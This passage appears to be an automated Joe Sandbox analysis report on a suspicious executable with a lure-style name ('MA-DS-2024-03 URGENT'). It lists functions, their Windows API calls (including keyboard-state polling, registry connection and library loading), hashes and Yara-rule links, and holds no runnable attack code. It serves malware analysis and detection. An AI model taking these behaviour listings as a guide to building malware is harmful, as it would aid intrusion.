                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_free
                                                        • String ID: 3cA$_A
                                                        • API String ID: 2620147621-3480954128
                                                        • Opcode ID: cd52e68eb8994818202cc38379586957e4432314458df140b9a3ed5bd26668b5
                                                        • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                                                        • Opcode Fuzzy Hash: cd52e68eb8994818202cc38379586957e4432314458df140b9a3ed5bd26668b5
                                                        • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                                                        Function 00416192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memset$_memmove
                                                        • String ID: 3cA$ERCP
                                                        • API String ID: 2532777613-1471582817
                                                        • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                        • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                                                        • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                        • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                                                        Function 00462753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 004627C0
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                        • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                                        • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                        • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                                        Function 00458E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_memmove$ClassName
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 365058703-1403004172
                                                        • Opcode ID: 37e78263d393d5b8ed0ad6ced2851d14854ed1b80b918288eea4e2fb559a05c4
                                                        • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                                        • Opcode Fuzzy Hash: 37e78263d393d5b8ed0ad6ced2851d14854ed1b80b918288eea4e2fb559a05c4
                                                        • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                                        Function 004863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                          • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                          • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                                        • LoadLibraryW.KERNEL32(?), ref: 00486468
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                                        • DestroyWindow.USER32(?), ref: 00486485
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                        • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                        • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                        • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                                        Function 00466D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                        • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                                        • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                        • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                                        Function 00466E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                        • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                                        • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                        • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                                        Function 0046AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                                        • __swprintf.LIBCMT ref: 0046ACC1
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                        • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                                        • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                        • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                                        Function 00461142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID: @F
                                                        • API String ID: 2875609808-2781531706
                                                        • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                        • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                                        • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                        • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                                        Function 016B3FC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,016B3F73,00000003,?,016B3F13,00000003,016CDE80,0000000C,016B403D,00000003,00000002), ref: 016B3FE2
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 016B3FF5
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,016B3F73,00000003,?,016B3F13,00000003,016CDE80,0000000C,016B403D,00000003,00000002,00000000), ref: 016B4018
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 70c47f72444ad692a50132e6f1b508f96df573b11229cb108134ed482f1780d4
                                                        • Instruction ID: e5d506236ad54c5015edc0753f712363e1de5e3a2282726f3a76bb3b6e015ab8
                                                        • Opcode Fuzzy Hash: 70c47f72444ad692a50132e6f1b508f96df573b11229cb108134ed482f1780d4
                                                        • Instruction Fuzzy Hash: C5F0443090021CBBDB219FD5DC49BEDBFB9EB04655F000058F906A2245DF745A94CB90
                                                        Function 0047EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                                        • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                        • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                                        • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                        • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                                        Function 00480037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3440857362-0
                                                        • Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                        • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                                        • Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                        • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                                        Function 0046E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: de6c3d61c613d2cf68e58176d0c6a238a9722d9a5366df973ef3e66f8046f82b
                                                        • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                                        • Opcode Fuzzy Hash: de6c3d61c613d2cf68e58176d0c6a238a9722d9a5366df973ef3e66f8046f82b
                                                        • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                                        Function 0048A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                        • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                                        • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                        • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                                        Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00402357
                                                        • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                        • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                        • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
